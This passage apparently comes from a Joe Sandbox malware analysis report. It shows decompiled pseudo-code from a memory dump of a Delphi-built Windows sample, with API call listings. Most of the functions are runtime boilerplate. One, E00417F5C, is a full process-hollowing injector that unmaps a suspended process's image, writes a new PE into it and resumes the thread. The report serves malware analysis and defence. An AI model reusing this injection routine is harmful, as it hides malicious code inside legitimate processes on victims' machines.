							if(_t27 !=  *_t8 && _t27 != 0) {
								FreeLibrary(_t27);
							}
						}
					}
					E00403A90();
					if( *((char*)(0x454658)) == 1) {
						 *0x00454654();
					}
					if( *((char*)(0x454658)) != 0) {
						E00403C60();
					}
					if( *0x454630 == 0) {
						if( *0x454024 != 0) {
							 *0x454024();
						}
						ExitProcess( *0x419000); // executed
					}
					memcpy(0x454630,  *0x454630, 0xb << 2);
					_t52 = _t52 + 0xc;
					0x419000 = 0x419000;
					goto L7;
				} else {
					do {
						 *0x454040 = 0;
						 *((intOrPtr*)( *0x454040))();
					} while ( *0x454040 != 0);
					goto L5;
				}
			}








    0x00403d16
    0x00403d33
    0x00403d4b
    0x00403d52
    0x00403d54
    0x00403d59
    0x00403d60
    0x00403d60
    0x00403d65
    0x00403d69
    0x00403d72
    0x00403d72
    0x00403d75
    0x00403d7e
    0x00403d85
    0x00403d8a
    0x00403d8c
    0x00403d91
    0x00403d94
    0x00403d94
    0x00403d97
    0x00403d9a
    0x00403da1
    0x00403da1
    0x00403d9a
    0x00403d8a
    0x00403da6
    0x00403daf
    0x00403db1
    0x00403db1
    0x00403db8
    0x00403dba
    0x00403dba
    0x00403dc2
    0x00403dcb
    0x00403dcd
    0x00403dcd
    0x00403dd6
    0x00403dd6
    0x00403de7
    0x00403de7
    0x00403de9
    0x00000000
    0x00403d3a
    0x00403d3a
    0x00403d40
    0x00403d44
    0x00403d46
    0x00000000
    0x00403d3a

    APIs
    • ExitProcess.KERNEL32(00000000,?,00000002,00403DFE,0040272B,00402773,00000000,00000000,004026A8,?,?,00000000,?,00402968,00000000,00402995), ref: 00403DD6
      • Part of subcall function 00403C90: GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001E,?,00000000,?,00403D5E,00000000,00000000,?,00000002,00403DFE,0040272B,00402773,00000000,00000000), ref: 00403CC9
      • Part of subcall function 00403C90: WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001E,?), ref: 00403CCF
      • Part of subcall function 00403C90: GetStdHandle.KERNEL32(000000F5,00403D18,00000002,?,00000000,00000000,?,00403D5E,00000000,00000000,?,00000002,00403DFE,0040272B,00402773,00000000), ref: 00403CE4
      • Part of subcall function 00403C90: WriteFile.KERNEL32(00000000,000000F5,00403D18,00000002,?), ref: 00403CEA
      • Part of subcall function 00403C90: MessageBoxA.USER32(00000000,Runtime error at 00000000,Error,00000000), ref: 00403D08
    • FreeLibrary.KERNEL32(00400000,00000000,00000000,?,00000002,00403DFE,0040272B,00402773,00000000,00000000,004026A8,?,?,00000000,?,00402968), ref: 00403DA1
    Memory Dump Source
    • Source File: 00000010.00000002.1534525531.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_16_2_400000_obtG43AWHP.jbxd
    Function 00403D18, Relevance: 3.1, APIs: 2, Instructions: 64
    C-Code - Quality: 79%
    			E00403D18() {
				struct HINSTANCE__* _t26;
				void* _t35;
				intOrPtr _t38;
				void* _t51;

				if( *0x00454658 != 0 ||  *0x454040 == 0) {
					L4:
					if( *0x419004 != 0) {
						E00403C04();
						E00403C90(_t35);
						 *0x419004 = 0;
					}
					L6:
					if( *((char*)(0x454658)) == 2 &&  *0x419000 == 0) {
						 *0x0045463C = 0;
					}
					E00403AB8();
					if( *((char*)(0x454658)) <= 1 ||  *0x419000 != 0) {
						_t16 =  *0x00454640;
						if( *0x00454640 != 0) {
							E0040532C(_t16);
							_t38 =  *((intOrPtr*)(0x454640));
							_t7 = _t38 + 0x10; // 0x400000
							_t26 =  *_t7;
							_t8 = _t38 + 4; // 0x400000
							if(_t26 !=  *_t8 && _t26 != 0) {
								FreeLibrary(_t26);
							}
						}
					}
					E00403A90();
					if( *((char*)(0x454658)) == 1) {
						 *0x00454654();
					}
					if( *((char*)(0x454658)) != 0) {
						E00403C60();
					}
					if( *0x454630 == 0) {
						if( *0x454024 != 0) {
							 *0x454024();
						}
						ExitProcess( *0x419000); // executed
					}
					memcpy(0x454630,  *0x454630, 0xb << 2);
					_t51 = _t51 + 0xc;
					0x419000 = 0x419000;
					goto L6;
				} else {
					do {
						 *0x454040 = 0;
						 *((intOrPtr*)( *0x454040))();
					} while ( *0x454040 != 0);
					goto L4;
				}
			}







    0x00403d33
    0x00403d4b
    0x00403d52
    0x00403d54
    0x00403d59
    0x00403d60
    0x00403d60
    0x00403d65
    0x00403d69
    0x00403d72
    0x00403d72
    0x00403d75
    0x00403d7e
    0x00403d85
    0x00403d8a
    0x00403d8c
    0x00403d91
    0x00403d94
    0x00403d94
    0x00403d97
    0x00403d9a
    0x00403da1
    0x00403da1
    0x00403d9a
    0x00403d8a
    0x00403da6
    0x00403daf
    0x00403db1
    0x00403db1
    0x00403db8
    0x00403dba
    0x00403dba
    0x00403dc2
    0x00403dcb
    0x00403dcd
    0x00403dcd
    0x00403dd6
    0x00403dd6
    0x00403de7
    0x00403de7
    0x00403de9
    0x00000000
    0x00403d3a
    0x00403d3a
    0x00403d40
    0x00403d44
    0x00403d46
    0x00000000
    0x00403d3a

    APIs
    • ExitProcess.KERNEL32(00000000,?,00000002,00403DFE,0040272B,00402773,00000000,00000000,004026A8,?,?,00000000,?,00402968,00000000,00402995), ref: 00403DD6
      • Part of subcall function 00403C90: GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001E,?,00000000,?,00403D5E,00000000,00000000,?,00000002,00403DFE,0040272B,00402773,00000000,00000000), ref: 00403CC9
      • Part of subcall function 00403C90: WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001E,?), ref: 00403CCF
      • Part of subcall function 00403C90: GetStdHandle.KERNEL32(000000F5,00403D18,00000002,?,00000000,00000000,?,00403D5E,00000000,00000000,?,00000002,00403DFE,0040272B,00402773,00000000), ref: 00403CE4
      • Part of subcall function 00403C90: WriteFile.KERNEL32(00000000,000000F5,00403D18,00000002,?), ref: 00403CEA
      • Part of subcall function 00403C90: MessageBoxA.USER32(00000000,Runtime error at 00000000,Error,00000000), ref: 00403D08
    • FreeLibrary.KERNEL32(00400000,00000000,00000000,?,00000002,00403DFE,0040272B,00402773,00000000,00000000,004026A8,?,?,00000000,?,00402968), ref: 00403DA1
    Memory Dump Source
    • Source File: 00000010.00000002.1534525531.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_16_2_400000_obtG43AWHP.jbxd
    Function 00405824, Relevance: 1.5, APIs: 1, Instructions: 31
    C-Code - Quality: 100%
    			E00405824(intOrPtr* __eax, void* __edx) {
				char _v1032;
				int _t13;
				void* _t22;

				_t21 = __edx;
				if(__eax != 0) {
					if( *(__eax + 4) >= 0x10000) {
						return E00404080(__edx,  *(__eax + 4));
					}
					_t13 = LoadStringA(E00404DCC( *((intOrPtr*)( *__eax))),  *(__eax + 4),  &_v1032, 0x400); // executed
					return E00403F78(_t21, _t13, _t22);
				}
				return __eax;
			}






    0x0040582c
    0x00405832
    0x0040583b
    0x00000000
    0x0040586c
    0x00405855
    0x00000000
    0x00405860
    0x00405879

    APIs
    • LoadStringA.USER32(00000000,00010000,?,00000400), ref: 00405855
    Memory Dump Source
    • Source File: 00000010.00000002.1534525531.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_16_2_400000_obtG43AWHP.jbxd
    Function 00404D84, Relevance: 1.5, APIs: 1, Instructions: 26
    C-Code - Quality: 100%
    			E00404D84(void* __eax) {
				char _v272;
				intOrPtr _t14;
				void* _t16;
				intOrPtr _t18;
				intOrPtr _t19;

				_t16 = __eax;
				if( *((intOrPtr*)(__eax + 0x10)) == 0) {
					GetModuleFileNameA( *(__eax + 4),  &_v272, 0x105);
					_t14 = E00404FC0(_t19); // executed
					_t18 = _t14;
					 *((intOrPtr*)(_t16 + 0x10)) = _t18;
					if(_t18 == 0) {
						 *((intOrPtr*)(_t16 + 0x10)) =  *((intOrPtr*)(_t16 + 4));
					}
				}
				return  *((intOrPtr*)(_t16 + 0x10));
			}








    0x00404d8c
    0x00404d92
    0x00404da2
    0x00404dab
    0x00404db0
    0x00404db2
    0x00404db7
    0x00404dbc
    0x00404dbc
    0x00404db7
    0x00404dca

    APIs
    • GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 00404DA2
      • Part of subcall function 00404FC0: GetModuleFileNameA.KERNEL32(00000000,?,00000105,0000000B,00000000), ref: 00404FDC
      • Part of subcall function 00404FC0: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,0000000B,00000000), ref: 00404FFA
      • Part of subcall function 00404FC0: RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,0000000B,00000000), ref: 00405018
      • Part of subcall function 00404FC0: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 00405036
      • Part of subcall function 00404FC0: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,?,00000000,004050C5,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 0040507F
      • Part of subcall function 00404FC0: RegQueryValueExA.ADVAPI32(?,0040522C,00000000,00000000,?,?,?,?,00000000,00000000,?,?,00000000,004050C5,?,80000001), ref: 0040509D
      • Part of subcall function 00404FC0: RegCloseKey.ADVAPI32(?,004050CC,00000000,?,?,00000000,004050C5,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 004050BF
      • Part of subcall function 00404FC0: lstrcpyn.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 004050DC
      • Part of subcall function 00404FC0: GetThreadLocale.KERNEL32(00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 004050E9
      • Part of subcall function 00404FC0: GetLocaleInfoA.KERNEL32(00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019), ref: 004050EF
      • Part of subcall function 00404FC0: lstrlen.KERNEL32(?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000), ref: 0040511A
      • Part of subcall function 00404FC0: lstrcpyn.KERNEL32(00000000,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 00405161
      • Part of subcall function 00404FC0: LoadLibraryExA.KERNEL32(?,00000000,00000002,00000000,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 00405171
      • Part of subcall function 00404FC0: lstrcpyn.KERNEL32(00000000,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 00405199
      • Part of subcall function 00404FC0: LoadLibraryExA.KERNEL32(?,00000000,00000002,00000000,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 004051A9
      • Part of subcall function 00404FC0: lstrcpyn.KERNEL32(00000000,?,00000105,?,00000000,00000002,00000000,?,00000105,?,00000000,00000003,?,00000005,?,?), ref: 004051CF
      • Part of subcall function 00404FC0: LoadLibraryExA.KERNEL32(?,00000000,00000002,00000000,?,00000105,?,00000000,00000002,00000000,?,00000105,?,00000000,00000003,?), ref: 004051DF
    Memory Dump Source
    • Source File: 00000010.00000002.1534525531.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_16_2_400000_obtG43AWHP.jbxd
    Function 00403B18, Relevance: .0, Instructions: 37
    Memory Dump Source
    • Source File: 00000010.00000002.1534525531.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_16_2_400000_obtG43AWHP.jbxd
    Function 00402670, Relevance: .0, Instructions: 14
    C-Code - Quality: 37%
    			E00402670(void* __eax) {
				void* _t3;
				void* _t6;

				if(__eax <= 0) {
					_t6 = 0;
				} else {
					_t3 =  *0x41903c(); // executed
					_t6 = _t3;
					if(_t6 == 0) {
						E00402778(1);
					}
				}
				return _t6;
			}





    0x00402673
    0x0040268a
    0x00402675
    0x00402675
    0x0040267b
    0x0040267f
    0x00402683
    0x00402683
    0x0040267f
    0x0040268f

    Memory Dump Source
    • Source File: 00000010.00000002.1534525531.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_16_2_400000_obtG43AWHP.jbxd
    Function 00403B78, Relevance: .0, Instructions: 12
    C-Code - Quality: 100%
    			E00403B78(intOrPtr __eax, intOrPtr __edx) {
				void* _t6;
				intOrPtr _t7;

				_t7 = __edx;
				 *0x454014 = 0x4011a8;
				 *0x454018 = 0x4011b0;
				 *0x454638 = __eax;
				 *0x45463c = 0;
				 *0x454640 = __edx;
				_t1 = _t7 + 4; // 0x400000
				 *0x45402c =  *_t1;
				E00403A70();
				 *0x454034 = 0; // executed
				_t6 = E00403B18(); // executed
				return _t6;
			}





    0x00403b78
    0x00403b78
    0x00403b82
    0x00403b8c
    0x00403b93
    0x00403b98
    0x00403b9e
    0x00403ba1
    0x00403ba6
    0x00403bab
    0x00403bb2
    0x00403bb7

    Memory Dump Source
    • Source File: 00000010.00000002.1534525531.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_16_2_400000_obtG43AWHP.jbxd

    Non-executed Functions

    Function 00417F5C, Relevance: 31.7, APIs: 16, Strings: 2, Instructions: 236
    C-Code - Quality: 76%
    			E00417F5C(intOrPtr __eax, void* __ebx, short* __ecx, char __edx, void* __edi, void* __esi, void* __fp0, intOrPtr* _a4) {
				intOrPtr _v8;
				char _v12;
				CONTEXT* _v16;
				void* _v20;
				void _v24;
				void _v28;
				long _v32;
				struct _PROCESS_INFORMATION _v48;
				struct _STARTUPINFOA _v116;
				CHAR* _t95;
				short* _t171;
				intOrPtr _t182;
				intOrPtr _t189;
				intOrPtr* _t194;
				short* _t196;
				void* _t197;
				void* _t199;
				void* _t200;
				intOrPtr _t201;
				void* _t215;

				_t215 = __fp0;
				_t199 = _t200;
				_t201 = _t200 + 0xffffff90;
				_t196 = __ecx;
				_v12 = __edx;
				_v8 = __eax;
				E00404338(_v8);
				E00404338(_v12);
				_push(_t199);
				_push(0x418218);
				_push( *[fs:eax]);
				 *[fs:eax] = _t201;
				if(_v12 != 0) {
					_push(0x418230);
					_push(_v8);
					_push(0x41823c);
					_push(_v12);
					E00404208();
				}
				 *_a4 = 0;
				_t171 = _t196;
				if( *_t171 == 0x5a4d) {
					_t194 =  *((intOrPtr*)(_t171 + 0x3c)) + _t196;
					if( *_t194 == 0x4550) {
						E00402B60( &_v116, 0x44);
						E00402B60( &_v48, 0x10);
						_v116.cb = 0x44;
						_v116.dwFlags = 1;
						_v116.wShowWindow = 0;
						_t95 = E00404348(_v12);
						if(CreateProcessA(E00404348(_v8), _t95, 0, 0, 0, 4, 0, 0,  &_v116,  &_v48) != 0) {
							 *_a4 = _v48.dwProcessId;
							_v16 = E00417F28( &_v20);
							if(_v16 != 0) {
								_v16->ContextFlags = 0x10007;
								if(GetThreadContext(_v48.hThread, _v16) != 0) {
									ReadProcessMemory(_v48.hProcess, _v16->Ebx + 8,  &_v24, 4,  &_v32);
									if( *(_t194 + 0x34) != _v24) {
										_v28 = VirtualAllocEx(_v48.hProcess,  *(_t194 + 0x34),  *(_t194 + 0x50), 0x3000, 0x40);
									} else {
										if(NtUnmapViewOfSection(_v48.hProcess,  *(_t194 + 0x34)) != 0) {
											_v28 = VirtualAllocEx(_v48.hProcess, 0,  *(_t194 + 0x50), 0x3000, 0x40);
										} else {
											_v28 = VirtualAllocEx(_v48.hProcess,  *(_t194 + 0x34),  *(_t194 + 0x50), 0x3000, 0x40);
										}
									}
									_t210 = _v28;
									if(_v28 != 0) {
										_t197 = E00417EA4(_t196, _t210);
										_t125 = _v28;
										if( *(_t194 + 0x34) != _v28) {
											E00417E10(_t215, _t197, _t194, _t125 -  *(_t194 + 0x34));
											 *(_t194 + 0x34) = _v28;
											E00405DE0( *((intOrPtr*)(_t171 + 0x3c)) + _t197, _t194);
										}
										WriteProcessMemory(_v48.hProcess, _v28, _t197,  *(_t194 + 0x50),  &_v32);
										WriteProcessMemory(_v48.hProcess, _v16->Ebx + 8,  &_v28, 4,  &_v32);
										_v16->Eax =  *((intOrPtr*)(_t194 + 0x28)) + _v28;
										SetThreadContext(_v48.hThread, _v16);
										ResumeThread(_v48.hThread);
										WaitForSingleObject(_v48.hThread, 0xffffffff);
										_push(_t199);
										_push(0x4181d0);
										_push( *[fs:eax]);
										 *[fs:eax] = _t201;
										TerminateThread(_v48.hProcess, 0);
										CloseHandle(_v48.hProcess);
										_pop(_t189);
										 *[fs:eax] = _t189;
									}
								}
								VirtualFree(_v20, 0, 0x8000);
							}
							if( *_a4 == 0) {
								TerminateProcess(_v48, 0);
							}
						}
					}
				}
				_pop(_t182);
				 *[fs:eax] = _t182;
				_push(E0041821F);
				return E00403EAC( &_v12, 2);
			}























    0x00417f5c
    0x00417f5d
    0x00417f5f
    0x00417f65
    0x00417f67
    0x00417f6a
    0x00417f70
    0x00417f78
    0x00417f7f
    0x00417f80
    0x00417f85
    0x00417f88
    0x00417f8f
    0x00417f91
    0x00417f96
    0x00417f99
    0x00417f9e
    0x00417fa9
    0x00417fa9
    0x00417fb3
    0x00417fb5
    0x00417fbc
    0x00417fc5
    0x00417fcd
    0x00417fdd
    0x00417fec
    0x00417ff1
    0x00417ff8
    0x00417fff
    0x0041801c
    0x00418032
    0x0041803e
    0x00418048
    0x0041804f
    0x00418058
    0x0041806d
    0x0041808e
    0x00418099
    0x004180fc
    0x0041809b
    0x004180aa
    0x004180df
    0x004180ac
    0x004180c4
    0x004180c4
    0x004180aa
    0x004180ff
    0x00418103
    0x00418110
    0x00418115
    0x0041811a
    0x00418122
    0x0041812a
    0x00418139
    0x00418139
    0x0041814f
    0x0041816f
    0x0041817d
    0x0041818b
    0x00418194
    0x0041819f
    0x004181a6
    0x004181a7
    0x004181ac
    0x004181af
    0x004181b8
    0x004181c1
    0x004181c8
    0x004181cb
    0x004181cb
    0x00418103
    0x004181e5
    0x004181e5
    0x004181f0
    0x004181f8
    0x004181f8
    0x004181f0
    0x00418032
    0x00417fcd
    0x004181ff
    0x00418202
    0x00418205
    0x00418217

    APIs
    • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000004,00000000,00000000,00000044,?), ref: 0041802B
      • Part of subcall function 00417F28: VirtualAlloc.KERNEL32(00000000,000000D0,00001000,00000004,?,00418048,00000000,00418218), ref: 00417F39
    • GetThreadContext.KERNEL32(?,00000000), ref: 00418066
    • ReadProcessMemory.KERNEL32(?,?,?,00000004,?,00000000,00418218), ref: 0041808E
    • NtUnmapViewOfSection.N(?,?,?,?,?,00000004,?,00000000,00418218), ref: 004180A3
    • VirtualAllocEx.KERNEL32(?,?,?,00003000,00000040,?,?,?,?,?,00000004,?,00000000,00418218), ref: 004180BF
    • VirtualAllocEx.KERNEL32(?,00000000,?,00003000,00000040,?,?,?,?,?,00000004,?,00000000,00418218), ref: 004180DA
    • VirtualAllocEx.KERNEL32(?,?,?,00003000,00000040,?,?,?,00000004,?,00000000,00418218), ref: 004180F7
    • WriteProcessMemory.KERNEL32(?,00000000,00000000,?,?,?,?,?,00003000,00000040,?,?,?,00000004,?,00000000), ref: 0041814F
    • WriteProcessMemory.KERNEL32(?,?,00000000,00000004,?,?,00000000,00000000,?,?,?,?,?,00003000,00000040,?), ref: 0041816F
    • SetThreadContext.KERNEL32(?,00000000), ref: 0041818B
    • ResumeThread.KERNEL32(?,?,?,00000000,00000004,?,?,00000000,00000000,?,?,?,?,?,00003000,00000040), ref: 00418194
    • WaitForSingleObject.KERNEL32(?,000000FF), ref: 0041819F
    • TerminateThread.KERNEL32(?,00000000,00000000,004181D0,?,?,?,?,00000000,00000004,?,?,00000000,00000000,?,?), ref: 004181B8
    • CloseHandle.KERNEL32(?), ref: 004181C1
    • VirtualFree.KERNEL32(?,00000000,00008000,00000000,00418218), ref: 004181E5
    • TerminateProcess.KERNEL32(?,00000000,00000000,00418218), ref: 004181F8
    Strings
    Memory Dump Source
    • Source File: 00000010.00000002.1534525531.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_16_2_400000_obtG43AWHP.jbxd
    Function 00404E08, Relevance: 24.6, APIs: 11, Strings: 3, Instructions: 136
    C-Code - Quality: 53%
    			E00404E08(char* __eax, intOrPtr __edx) {
				char* _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				struct _WIN32_FIND_DATAA _v334;
				char _v595;
				void* _t45;
				char* _t54;
				char* _t64;
				void* _t83;
				intOrPtr* _t84;
				char* _t90;
				struct HINSTANCE__* _t91;
				char* _t93;
				void* _t94;
				char* _t95;
				void* _t96;

				_v12 = __edx;
				_v8 = __eax;
				_v16 = _v8;
				_t91 = GetModuleHandleA("kernel32.dll");
				if(_t91 == 0) {
					L4:
					if( *_v8 != 0x5c) {
						_t93 = _v8 + 2;
						goto L10;
					} else {
						if( *((char*)(_v8 + 1)) == 0x5c) {
							_t95 = E00404DF4(_v8 + 2);
							if( *_t95 != 0) {
								_t14 = _t95 + 1; // 0x1
								_t93 = E00404DF4(_t14);
								if( *_t93 != 0) {
									L10:
									_t83 = _t93 - _v8;
									_push(_t83 + 1);
									_push(_v8);
									_push( &_v595);
									L00401248();
									while( *_t93 != 0) {
										_t90 = E00404DF4(_t93 + 1);
										_t45 = _t90 - _t93;
										if(_t45 + _t83 + 1 <= 0x105) {
											_push(_t45 + 1);
											_push(_t93);
											_push( &(( &_v595)[_t83]));
											L00401248();
											_t94 = FindFirstFileA( &_v595,  &_v334);
											if(_t94 != 0xffffffff) {
												FindClose(_t94);
												_t54 =  &(_v334.cFileName);
												_push(_t54);
												L00401250();
												if(_t54 + _t83 + 1 + 1 <= 0x105) {
													 *((char*)(_t96 + _t83 - 0x24f)) = 0x5c;
													_push(0x105 - _t83 - 1);
													_push( &(_v334.cFileName));
													_push( &(( &(( &_v595)[_t83]))[1]));
													L00401248();
													_t64 =  &(_v334.cFileName);
													_push(_t64);
													L00401250();
													_t83 = _t83 + _t64 + 1;
													_t93 = _t90;
													continue;
												}
											}
										}
										goto L17;
									}
									_push(_v12);
									_push( &_v595);
									_push(_v8);
									L00401248();
								}
							}
						}
					}
				} else {
					_t84 = GetProcAddress(_t91, "GetLongPathNameA");
					if(_t84 == 0) {
						goto L4;
					} else {
						_push(0x105);
						_push( &_v595);
						_push(_v8);
						if( *_t84() == 0) {
							goto L4;
						} else {
							_push(_v12);
							_push( &_v595);
							_push(_v8);
							L00401248();
						}
					}
				}
				L17:
				return _v16;
			}



















    0x00404e14
    0x00404e17
    0x00404e1d
    0x00404e2a
    0x00404e2e
    0x00404e70
    0x00404e76
    0x00404eb3
    0x00000000
    0x00404e78
    0x00404e7f
    0x00404e90
    0x00404e95
    0x00404e9b
    0x00404ea3
    0x00404ea8
    0x00404eb6
    0x00404eb8
    0x00404ebe
    0x00404ec2
    0x00404ec9
    0x00404eca
    0x00404f75
    0x00404edc
    0x00404ee0
    0x00404eed
    0x00404ef4
    0x00404ef5
    0x00404efe
    0x00404eff
    0x00404f17
    0x00404f1c
    0x00404f1f
    0x00404f24
    0x00404f2a
    0x00404f2b
    0x00404f3b
    0x00404f3d
    0x00404f4d
    0x00404f54
    0x00404f5e
    0x00404f5f
    0x00404f64
    0x00404f6a
    0x00404f6b
    0x00404f71
    0x00404f73
    0x00000000
    0x00404f73
    0x00404f3b
    0x00404f1c
    0x00000000
    0x00404eed
    0x00404f81
    0x00404f88
    0x00404f8c
    0x00404f8d
    0x00404f8d
    0x00404ea8
    0x00404e95
    0x00404e7f
    0x00404e30
    0x00404e3b
    0x00404e3f
    0x00000000
    0x00404e41
    0x00404e41
    0x00404e4c
    0x00404e50
    0x00404e55
    0x00000000
    0x00404e57
    0x00404e5a
    0x00404e61
    0x00404e65
    0x00404e66
    0x00404e66
    0x00404e55
    0x00404e3f
    0x00404f92
    0x00404f9b

    APIs
    • GetModuleHandleA.KERNEL32(kernel32.dll,004067D8,0000000B,00000000,?,00405068,00000000,004050C5,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 00404E25
    • GetProcAddress.KERNEL32(00000000,GetLongPathNameA,kernel32.dll,004067D8,0000000B,00000000,?,00405068,00000000,004050C5,?,80000001,Software\Borland\Locales,00000000,000F0019,?), ref: 00404E36
    • lstrcpyn.KERNEL32(?,?,?,?,00405068,00000000,004050C5,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 00404E66
    • lstrcpyn.KERNEL32(?,?,?,kernel32.dll,004067D8,0000000B,00000000,?,00405068,00000000,004050C5,?,80000001,Software\Borland\Locales,00000000,000F0019), ref: 00404ECA
      • Part of subcall function 00404DF4: CharNextA.USER32(?), ref: 00404DF7
    • lstrcpyn.KERNEL32(?,?,00000001,?,?,?,kernel32.dll,004067D8,0000000B,00000000,?,00405068,00000000,004050C5,?,80000001), ref: 00404EFF
    • FindFirstFileA.KERNEL32(?,?,?,?,00000001,?,?,?,kernel32.dll,004067D8,0000000B,00000000,?,00405068,00000000,004050C5), ref: 00404F12
    • FindClose.KERNEL32(00000000,?,?,?,?,00000001,?,?,?,kernel32.dll,004067D8,0000000B,00000000,?,00405068,00000000), ref: 00404F1F
    • lstrlen.KERNEL32(?,00000000,?,?,?,?,00000001,?,?,?,kernel32.dll,004067D8,0000000B,00000000,?,00405068), ref: 00404F2B
    • lstrcpyn.KERNEL32(0000005D,?,00000104,?,00000000,?,?,?,?,00000001,?,?,?,kernel32.dll,004067D8,0000000B), ref: 00404F5F
    • lstrlen.KERNEL32(?,0000005D,?,00000104,?,00000000,?,?,?,?,00000001,?,?,?,kernel32.dll,004067D8), ref: 00404F6B
    • lstrcpyn.KERNEL32(?,0000005C,?,?,0000005D,?,00000104,?,00000000,?,?,?,?,00000001,?,?), ref: 00404F8D
    Strings
    Memory Dump Source
    • Source File: 00000010.00000002.1534525531.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_16_2_400000_obtG43AWHP.jbxd
    Function 0040B2B4, Relevance: 3.0, APIs: 2, Instructions: 37
    C-Code - Quality: 46%
    			E0040B2B4(int __eax, void* __ebx, void* __eflags) {
				char _v11;
				char _v16;
				intOrPtr _t28;
				void* _t31;
				void* _t33;

				_t33 = __eflags;
				_v16 = 0;
				_push(_t31);
				_push(0x40b318);
				_push( *[fs:edx]);
				 *[fs:edx] = _t31 + 0xfffffff4;
				GetLocaleInfoA(__eax, 0x1004,  &_v11, 7);
				E004040F8( &_v16, 7,  &_v11);
				_push(_v16);
				E00407174(7, GetACP(), _t33);
				_pop(_t28);
				 *[fs:eax] = _t28;
				_push(E0040B31F);
				return E00403E88( &_v16);
			}








    0x0040b2b4
    0x0040b2bd
    0x0040b2c2
    0x0040b2c3
    0x0040b2c8
    0x0040b2cb
    0x0040b2da
    0x0040b2ea
    0x0040b2f2
    0x0040b2fb
    0x0040b304
    0x0040b307
    0x0040b30a
    0x0040b317

    APIs
    • GetLocaleInfoA.KERNEL32(?,00001004,?,00000007,00000000,0040B318), ref: 0040B2DA
    • GetACP.KERNEL32(?,?,00001004,?,00000007,00000000,0040B318), ref: 0040B2F3
    Memory Dump Source
    • Source File: 00000010.00000002.1534525531.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_16_2_400000_obtG43AWHP.jbxd
    Function 0040587A, Relevance: 1.5, APIs: 1, Instructions: 38
    C-Code - Quality: 51%
    			E0040587A(int __eax, void* __ebx, void* __eflags) {
				char _v8;
				char _v15;
				char _v20;
				intOrPtr _t29;
				void* _t32;

				_v20 = 0;
				_push(_t32);
				_push(0x4058e2);
				_push( *[fs:edx]);
				 *[fs:edx] = _t32 + 0xfffffff0;
				GetLocaleInfoA(__eax, 0x1004,  &_v15, 7);
				E004040F8( &_v20, 7,  &_v15);
				E00402B80(_v20,  &_v8);
				if(_v8 != 0) {
				}
				_pop(_t29);
				 *[fs:eax] = _t29;
				_push(E004058E9);
				return E00403E88( &_v20);
			}








    0x00405885
    0x0040588a
    0x0040588b
    0x00405890
    0x00405893
    0x004058a2
    0x004058b2
    0x004058bd
    0x004058c8
    0x004058c8
    0x004058ce
    0x004058d1
    0x004058d4
    0x004058e1

    APIs
    • GetLocaleInfoA.KERNEL32(?,00001004,?,00000007,00000000,004058E2), ref: 004058A2
    Memory Dump Source
    • Source File: 00000010.00000002.1534525531.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_16_2_400000_obtG43AWHP.jbxd
    Function 0040587C, Relevance: 1.5, APIs: 1, Instructions: 37
    C-Code - Quality: 51%
    			E0040587C(int __eax, void* __ebx, void* __eflags) {
				char _v8;
				char _v15;
				char _v20;
				intOrPtr _t29;
